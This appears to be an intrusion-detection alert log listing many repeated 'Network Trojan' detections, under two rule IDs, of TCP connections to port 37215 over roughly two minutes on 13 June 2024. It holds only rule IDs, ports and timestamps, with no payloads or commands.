              SID:2829579
              Source Port:35692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830373
              SID:2829579
              Source Port:48316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259155
              SID:2835222
              Source Port:41578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125864
              SID:2829579
              Source Port:57662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867990
              SID:2835222
              Source Port:59156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952411
              SID:2829579
              Source Port:38008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304092
              SID:2829579
              Source Port:41282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553324
              SID:2835222
              Source Port:52562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268590
              SID:2829579
              Source Port:52160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045500
              SID:2829579
              Source Port:49664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421138
              SID:2835222
              Source Port:38828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350062
              SID:2835222
              Source Port:35536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227491
              SID:2829579
              Source Port:33928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243236
              SID:2835222
              Source Port:41406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837133
              SID:2835222
              Source Port:50916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177708
              SID:2829579
              Source Port:44970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246211
              SID:2835222
              Source Port:50688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192136
              SID:2829579
              Source Port:33028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213189
              SID:2835222
              Source Port:46556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996513
              SID:2829579
              Source Port:38020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317025
              SID:2835222
              Source Port:59442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670892
              SID:2835222
              Source Port:45982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196717
              SID:2835222
              Source Port:42396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134340
              SID:2829579
              Source Port:50586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125674
              SID:2835222
              Source Port:46514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503467
              SID:2829579
              Source Port:34934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630150
              SID:2829579
              Source Port:40806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785574
              SID:2835222
              Source Port:54946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935868
              SID:2829579
              Source Port:41152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403813
              SID:2835222
              Source Port:60394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091048
              SID:2835222
              Source Port:38098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274294
              SID:2835222
              Source Port:44450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349218
              SID:2835222
              Source Port:40458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224449
              SID:2835222
              Source Port:52830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487767
              SID:2835222
              Source Port:43626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229829
              SID:2829579
              Source Port:40660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402301
              SID:2835222
              Source Port:37638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834815
              SID:2835222
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173893
              SID:2829579
              Source Port:55048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572827
              SID:2829579
              Source Port:47466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453289
              SID:2829579
              Source Port:54294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040720
              SID:2835222
              Source Port:34136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198142
              SID:2829579
              Source Port:42642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439108
              SID:2835222
              Source Port:38632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697728
              SID:2835222
              Source Port:42832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697053
              SID:2829579
              Source Port:40834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754929
              SID:2835222
              Source Port:49472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373881
              SID:2835222
              Source Port:42556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678763
              SID:2829579
              Source Port:48458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128269
              SID:2829579
              Source Port:34240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059688
              SID:2835222
              Source Port:55646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987857
              SID:2835222
              Source Port:50152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110094
              SID:2835222
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750587
              SID:2829579
              Source Port:50086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177482
              SID:2835222
              Source Port:42980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707847
              SID:2835222
              Source Port:44352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407798
              SID:2835222
              Source Port:39894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300304
              SID:2835222
              Source Port:54622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355337
              SID:2829579
              Source Port:53628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554372
              SID:2829579
              Source Port:46856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127919
              SID:2835222
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153028
              SID:2835222
              Source Port:50526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316995
              SID:2829579
              Source Port:37882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320061
              SID:2835222
              Source Port:56954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786467
              SID:2829579
              Source Port:58978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309627
              SID:2835222
              Source Port:53778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995407
              SID:2829579
              Source Port:60450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170206
              SID:2835222
              Source Port:46028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346214
              SID:2829579
              Source Port:52012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801980
              SID:2835222
              Source Port:45286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726189
              SID:2829579
              Source Port:37442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571656
              SID:2829579
              Source Port:37746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488196
              SID:2835222
              Source Port:53864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831915
              SID:2829579
              Source Port:52358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914019
              SID:2829579
              Source Port:34242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731753
              SID:2835222
              Source Port:46690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164336
              SID:2829579
              Source Port:46342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995735
              SID:2835222
              Source Port:52524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041880
              SID:2835222
              Source Port:56772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488340
              SID:2829579
              Source Port:34178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077266
              SID:2829579
              Source Port:52840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043563
              SID:2835222
              Source Port:35620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264683
              SID:2835222
              Source Port:36984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213880
              SID:2835222
              Source Port:59596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111889
              SID:2835222
              Source Port:41618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609352
              SID:2835222
              Source Port:56676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456947
              SID:2829579
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221592
              SID:2829579
              Source Port:48674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155252
              SID:2829579
              Source Port:43328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403194
              SID:2835222
              Source Port:44598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126759
              SID:2835222
              Source Port:43170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993494
              SID:2829579
              Source Port:46990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676900
              SID:2829579
              Source Port:57604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750619
              SID:2829579
              Source Port:40760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451941
              SID:2829579
              Source Port:50330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440282
              SID:2829579
              Source Port:48094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844172
              SID:2829579
              Source Port:52406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782195
              SID:2829579
              Source Port:54830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212610
              SID:2829579
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258327
              SID:2829579
              Source Port:51872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132332
              SID:2829579
              Source Port:60894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843955
              SID:2835222
              Source Port:53268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403386
              SID:2829579
              Source Port:59216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262473
              SID:2829579
              Source Port:52498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836728
              SID:2835222
              Source Port:34444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995897
              SID:2835222
              Source Port:36050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727177
              SID:2829579
              Source Port:33218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150414
              SID:2835222
              Source Port:34600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306609
              SID:2829579
              Source Port:41470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130988
              SID:2829579
              Source Port:41422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275651
              SID:2835222
              Source Port:38682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223062
              SID:2829579
              Source Port:36556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301447
              SID:2829579
              Source Port:34310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307438
              SID:2835222
              Source Port:53422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785485
              SID:2835222
              Source Port:58668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886149
              SID:2835222
              Source Port:58686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358390
              SID:2829579
              Source Port:39548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913261
              SID:2835222
              Source Port:52966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543479
              SID:2829579
              Source Port:52790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407260
              SID:2829579
              Source Port:36852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294852
              SID:2829579
              Source Port:53104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198314
              SID:2835222
              Source Port:58830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871701
              SID:2829579
              Source Port:46306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231198
              SID:2835222
              Source Port:43894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486585
              SID:2829579
              Source Port:41984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110311
              SID:2829579
              Source Port:51280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214520
              SID:2835222
              Source Port:57174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167543
              SID:2829579
              Source Port:48590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784599
              SID:2835222
              Source Port:34808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617702
              SID:2829579
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791678
              SID:2829579
              Source Port:37540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886337
              SID:2829579
              Source Port:42242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752181
              SID:2835222
              Source Port:51080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480279
              SID:2835222
              Source Port:39402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460143
              SID:2835222
              Source Port:47046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094100
              SID:2829579
              Source Port:56730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131212
              SID:2835222
              Source Port:55948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404491
              SID:2829579
              Source Port:42914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569291
              SID:2829579
              Source Port:41938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404343
              SID:2829579
              Source Port:48424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439480
              SID:2829579
              Source Port:52954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785930
              SID:2829579
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195779
              SID:2829579
              Source Port:53998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708302
              SID:2829579
              Source Port:58058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568246
              SID:2835222
              Source Port:39512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044882
              SID:2835222
              Source Port:57972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757086
              SID:2829579
              Source Port:51720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505459
              SID:2829579
              Source Port:59150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229409
              SID:2829579
              Source Port:59364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819931
              SID:2829579
              Source Port:38100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096606
              SID:2835222
              Source Port:38382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424169
              SID:2835222
              Source Port:41782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451858
              SID:2835222
              Source Port:49860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757492
              SID:2829579
              Source Port:56010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506293
              SID:2829579
              Source Port:36256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969406
              SID:2835222
              Source Port:56598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.609923
              SID:2829579
              Source Port:33972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610904
              SID:2835222
              Source Port:42976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757610
              SID:2829579
              Source Port:51332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636123
              SID:2835222
              Source Port:59506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785953
              SID:2835222
              Source Port:53394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227741
              SID:2829579
              Source Port:38200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045343
              SID:2829579
              Source Port:44600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474862
              SID:2835222
              Source Port:36040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173449
              SID:2829579
              Source Port:59188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696971
              SID:2835222
              Source Port:58018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613466
              SID:2835222
              Source Port:45186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937476
              SID:2829579
              Source Port:51444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872079
              SID:2829579
              Source Port:40098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.489092
              SID:2829579
              Source Port:44024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803612
              SID:2835222
              Source Port:49306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217257
              SID:2835222
              Source Port:39590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169333
              SID:2835222
              Source Port:53242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027564
              SID:2835222
              Source Port:50028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977831
              SID:2835222
              Source Port:60772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730772
              SID:2829579
              Source Port:48738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.936964
              SID:2835222
              Source Port:55714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555553
              SID:2829579
              Source Port:48930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076788
              SID:2829579
              Source Port:35916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276773
              SID:2835222
              Source Port:49756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213540
              SID:2835222
              Source Port:38970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256289
              SID:2829579
              Source Port:59510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787877
              SID:2835222
              Source Port:54474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544605
              SID:2835222
              Source Port:44840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274983
              SID:2835222
              Source Port:42178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437527
              SID:2829579
              Source Port:48036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126440
              SID:2835222
              Source Port:59388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474066
              SID:2829579
              Source Port:51506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078983
              SID:2829579
              Source Port:58676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630904
              SID:2835222
              Source Port:39874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.299990
              SID:2835222
              Source Port:45860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213577
              SID:2829579
              Source Port:49352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276925
              SID:2829579
              Source Port:60912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938624
              SID:2829579
              Source Port:39596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670522
              SID:2829579
              Source Port:34140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477580
              SID:2835222
              Source Port:41338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131175
              SID:2829579
              Source Port:59622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401716
              SID:2835222
              Source Port:54080
              Destination Port:37215
